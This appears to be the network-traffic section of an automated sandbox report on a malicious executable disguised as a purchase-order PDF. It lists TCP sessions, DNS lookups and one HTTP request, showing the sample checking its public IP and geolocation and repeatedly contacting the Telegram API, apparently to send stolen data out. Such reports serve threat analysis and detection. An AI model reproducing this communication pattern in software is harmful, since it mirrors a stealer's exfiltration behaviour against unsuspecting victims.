                                                                                                          Dec 17, 2024 03:30:14.445112944 CET44349785149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:14.445296049 CET44349785149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:14.445401907 CET49785443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:14.445880890 CET49785443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:14.451617002 CET4978780192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:14.571389914 CET8049787193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:14.571472883 CET4978780192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:14.571630955 CET4978780192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:14.691369057 CET8049787193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:19.952058077 CET8049787193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:20.006290913 CET4978780192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:20.188060999 CET49803443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:20.188150883 CET44349803149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:20.190052986 CET49803443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:20.190406084 CET49803443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:20.190440893 CET44349803149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:21.604162931 CET44349803149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:21.608295918 CET49803443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:21.608365059 CET44349803149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:21.608475924 CET49803443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:21.608503103 CET44349803149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:22.223799944 CET44349803149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:22.223974943 CET44349803149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:22.224459887 CET49803443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:22.224793911 CET49803443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:22.227643967 CET4978780192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:22.228961945 CET4980980192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:22.347758055 CET8049787193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:22.348145962 CET4978780192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:22.348710060 CET8049809193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:22.349040985 CET4980980192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:22.349205017 CET4980980192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:22.468846083 CET8049809193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:23.850805998 CET8049809193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:23.851938963 CET49815443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:23.852029085 CET44349815149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:23.852121115 CET49815443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:23.852426052 CET49815443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:23.852509022 CET44349815149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:23.896888971 CET4980980192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:25.245055914 CET44349815149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:25.246407986 CET49815443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:25.246470928 CET44349815149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:25.246788979 CET49815443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:25.246846914 CET44349815149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:25.891895056 CET44349815149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:25.892004967 CET44349815149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:25.892071962 CET49815443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:25.892412901 CET49815443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:25.895106077 CET4980980192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:25.896289110 CET4982080192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:26.101530075 CET8049820193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:26.101608038 CET4982080192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:26.101749897 CET4982080192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:26.103545904 CET8049809193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:26.103607893 CET4980980192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:26.221787930 CET8049820193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:28.780415058 CET8049820193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:28.781661987 CET49827443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:28.781747103 CET44349827149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:28.781826019 CET49827443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:28.782128096 CET49827443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:28.782166004 CET44349827149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:28.834295988 CET4982080192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:30.148979902 CET44349827149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:30.150507927 CET49827443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:30.150568962 CET44349827149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:30.150648117 CET49827443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:30.150662899 CET44349827149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:30.827014923 CET44349827149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:30.827236891 CET44349827149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:30.827330112 CET49827443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:30.827632904 CET49827443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:30.831228018 CET4982080192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:30.832369089 CET4983380192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:30.951744080 CET8049820193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:30.951951981 CET4982080192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:30.952142954 CET8049833193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:30.952270985 CET4983380192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:30.952403069 CET4983380192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:31.072063923 CET8049833193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:33.184701920 CET8049833193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:33.185761929 CET49839443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:33.185808897 CET44349839149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:33.185878992 CET49839443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:33.186127901 CET49839443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:33.186146021 CET44349839149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:33.224925041 CET4983380192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:34.569333076 CET44349839149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:34.571264029 CET49839443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:34.571325064 CET44349839149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:34.571400881 CET49839443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:34.571423054 CET44349839149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:35.275688887 CET44349839149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:35.277359009 CET44349839149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:35.277543068 CET49839443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:35.277939081 CET49839443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:35.281599045 CET4983380192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:35.282715082 CET4984580192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:35.401719093 CET8049833193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:35.401912928 CET4983380192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:35.402712107 CET8049845193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:35.402832031 CET4984580192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:35.403019905 CET4984580192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:35.523010969 CET8049845193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:36.499257088 CET8049845193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:36.500771046 CET49850443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:36.500854969 CET44349850149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:36.501147032 CET49850443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:36.501393080 CET49850443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:36.501418114 CET44349850149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:36.553287983 CET4984580192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:37.870995998 CET44349850149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:37.872787952 CET49850443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:37.872847080 CET44349850149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:37.872982979 CET49850443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:37.873006105 CET44349850149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:38.521420002 CET44349850149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:38.521775961 CET44349850149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:38.521967888 CET49850443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:38.522269011 CET49850443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:38.524940968 CET4984580192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:38.526005983 CET4985680192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:38.645318985 CET8049845193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:38.645417929 CET4984580192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:38.645751953 CET8049856193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:38.645819902 CET4985680192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:38.645919085 CET4985680192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:38.767467022 CET8049856193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:41.932009935 CET8049856193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:41.933645964 CET49863443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:41.933690071 CET44349863149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:41.933778048 CET49863443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:41.934150934 CET49863443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:41.934170008 CET44349863149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:41.974968910 CET4985680192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:43.375444889 CET44349863149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:43.377413034 CET49863443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:43.377471924 CET44349863149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:43.377537966 CET49863443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:43.377561092 CET44349863149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:44.061017990 CET44349863149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:44.061197996 CET44349863149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:44.061289072 CET49863443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:44.061709881 CET49863443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:44.065311909 CET4985680192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:44.066658020 CET4986980192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:44.185452938 CET8049856193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:44.185589075 CET4985680192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:44.186438084 CET8049869193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:44.186583996 CET4986980192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:44.186748981 CET4986980192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:44.306468010 CET8049869193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:46.649015903 CET8049869193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:46.650144100 CET49875443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:46.650171995 CET44349875149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:46.650250912 CET49875443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:46.650607109 CET49875443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:46.650623083 CET44349875149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:46.693814993 CET4986980192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:48.020370007 CET44349875149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:48.022317886 CET49875443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:48.022335052 CET44349875149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:48.022384882 CET49875443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:48.022393942 CET44349875149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:48.646699905 CET44349875149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:48.646876097 CET44349875149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:48.646946907 CET49875443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:48.647392035 CET49875443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:48.650727034 CET4986980192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:48.651901007 CET4988080192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:48.770921946 CET8049869193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:48.771187067 CET4986980192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:48.771595001 CET8049880193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:48.775103092 CET4988080192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:48.775249004 CET4988080192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:48.894926071 CET8049880193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:49.871965885 CET8049880193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:49.873337030 CET49885443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:49.873424053 CET44349885149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:49.873517036 CET49885443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:49.873783112 CET49885443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:49.873821974 CET44349885149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:49.928080082 CET4988080192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:51.241199017 CET44349885149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:51.242938995 CET49885443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:51.242965937 CET44349885149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:51.243138075 CET49885443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:51.243165016 CET44349885149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:51.952070951 CET44349885149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:51.952344894 CET44349885149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:51.952554941 CET49885443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:51.952717066 CET49885443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:51.956033945 CET4988080192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:51.957075119 CET4989180192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:52.076385021 CET8049880193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:52.076623917 CET4988080192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:52.076968908 CET8049891193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:52.077229977 CET4989180192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:52.077415943 CET4989180192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:52.214238882 CET8049891193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:54.273268938 CET8049891193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:54.274993896 CET49898443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:54.275087118 CET44349898149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:54.275177956 CET49898443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:54.275461912 CET49898443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:54.275495052 CET44349898149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:54.318732023 CET4989180192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:55.655864954 CET44349898149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:55.657880068 CET49898443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:55.657958031 CET44349898149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:55.658039093 CET49898443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:55.658063889 CET44349898149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:56.279805899 CET44349898149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:56.279999971 CET44349898149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:56.280220032 CET49898443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:56.280543089 CET49898443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:56.285176039 CET4989180192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:56.286240101 CET4990180192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:56.405927896 CET8049891193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:56.406054020 CET8049901193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:56.406169891 CET4989180192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:56.406385899 CET4990180192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:56.406482935 CET4990180192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:56.526457071 CET8049901193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:58.549431086 CET8049901193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:30:58.559432030 CET49907443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:58.559524059 CET44349907149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:58.560862064 CET49907443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:58.564913034 CET49907443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:58.564948082 CET44349907149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:58.600013018 CET4990180192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:30:59.930592060 CET44349907149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:59.935419083 CET49907443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:59.935460091 CET44349907149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:30:59.935590982 CET49907443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:30:59.935602903 CET44349907149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:31:00.594707012 CET44349907149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:31:00.594856024 CET44349907149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:31:00.594928026 CET49907443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:31:00.595346928 CET49907443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:31:00.598485947 CET4990180192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:31:00.599164963 CET4991380192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:31:00.719603062 CET8049901193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:31:00.719912052 CET8049913193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:31:00.720038891 CET4990180192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:31:00.720200062 CET4991380192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:31:00.720274925 CET4991380192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:31:00.841027975 CET8049913193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:31:03.529387951 CET8049913193.122.130.0192.168.2.4
                                                                                                          Dec 17, 2024 03:31:03.584389925 CET4991380192.168.2.4193.122.130.0
                                                                                                          Dec 17, 2024 03:31:04.059324026 CET49920443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:31:04.059351921 CET44349920149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:31:04.059421062 CET49920443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:31:04.059756994 CET49920443192.168.2.4149.154.167.220
                                                                                                          Dec 17, 2024 03:31:04.059772968 CET44349920149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:31:05.426922083 CET44349920149.154.167.220192.168.2.4
                                                                                                          Dec 17, 2024 03:31:05.475009918 CET49920443192.168.2.4149.154.167.220
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 17, 2024 03:29:37.735479116 CET5917253192.168.2.41.1.1.1
                                                                                                          Dec 17, 2024 03:29:37.961224079 CET53591721.1.1.1192.168.2.4
                                                                                                          Dec 17, 2024 03:29:40.030520916 CET5898353192.168.2.41.1.1.1
                                                                                                          Dec 17, 2024 03:29:40.256015062 CET53589831.1.1.1192.168.2.4
                                                                                                          Dec 17, 2024 03:29:44.842318058 CET5192353192.168.2.41.1.1.1
                                                                                                          Dec 17, 2024 03:29:45.067511082 CET53519231.1.1.1192.168.2.4
                                                                                                          Dec 17, 2024 03:29:47.885600090 CET5112953192.168.2.41.1.1.1
                                                                                                          Dec 17, 2024 03:29:48.111742020 CET53511291.1.1.1192.168.2.4
                                                                                                          Dec 17, 2024 03:29:55.625483990 CET6312553192.168.2.41.1.1.1
                                                                                                          Dec 17, 2024 03:29:55.850902081 CET53631251.1.1.1192.168.2.4
                                                                                                          Dec 17, 2024 03:30:19.956463099 CET6527053192.168.2.41.1.1.1
                                                                                                          Dec 17, 2024 03:30:20.181792021 CET53652701.1.1.1192.168.2.4
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Dec 17, 2024 03:29:37.735479116 CET192.168.2.41.1.1.10xb9aeStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:29:40.030520916 CET192.168.2.41.1.1.10x7917Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:29:44.842318058 CET192.168.2.41.1.1.10x844cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:29:47.885600090 CET192.168.2.41.1.1.10x1f10Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:29:55.625483990 CET192.168.2.41.1.1.10xd23Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:30:19.956463099 CET192.168.2.41.1.1.10x9924Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Dec 17, 2024 03:29:37.961224079 CET1.1.1.1192.168.2.40xb9aeNo error (0)drive.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:29:40.256015062 CET1.1.1.1192.168.2.40x7917No error (0)drive.usercontent.google.com142.250.185.193A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:29:45.067511082 CET1.1.1.1192.168.2.40x844cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:29:45.067511082 CET1.1.1.1192.168.2.40x844cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:29:45.067511082 CET1.1.1.1192.168.2.40x844cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:29:45.067511082 CET1.1.1.1192.168.2.40x844cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:29:45.067511082 CET1.1.1.1192.168.2.40x844cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:29:45.067511082 CET1.1.1.1192.168.2.40x844cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:29:48.111742020 CET1.1.1.1192.168.2.40x1f10No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:29:48.111742020 CET1.1.1.1192.168.2.40x1f10No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:29:55.850902081 CET1.1.1.1192.168.2.40xd23No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                          Dec 17, 2024 03:30:20.181792021 CET1.1.1.1192.168.2.40x9924No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                          • drive.google.com
                                                                                                          • drive.usercontent.google.com
                                                                                                          • reallyfreegeoip.org
                                                                                                          • api.telegram.org
                                                                                                          • checkip.dyndns.org
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449738193.122.130.0807716C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 17, 2024 03:29:45.192862034 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 17, 2024 03:29:47.162818909 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 02:29:47 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: dc6bbe3aedd11b73b6c769bcb795eec4
